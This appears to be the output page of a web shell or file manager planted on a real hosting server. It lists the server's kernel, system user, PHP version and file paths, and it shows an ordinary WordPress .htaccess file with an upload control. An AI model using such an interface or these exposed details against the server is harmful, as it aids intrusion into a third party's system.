HEX
Server: Apache
System: Linux srv02.enodia.de 5.15.0-139-generic #149-Ubuntu SMP Fri Apr 11 22:06:13 UTC 2025 x86_64
User: s-t-massivhaus.de_v9um4stdo5 (10018)
PHP: 8.3.30
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/s-t-massivhaus.de/httpdocs/.htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>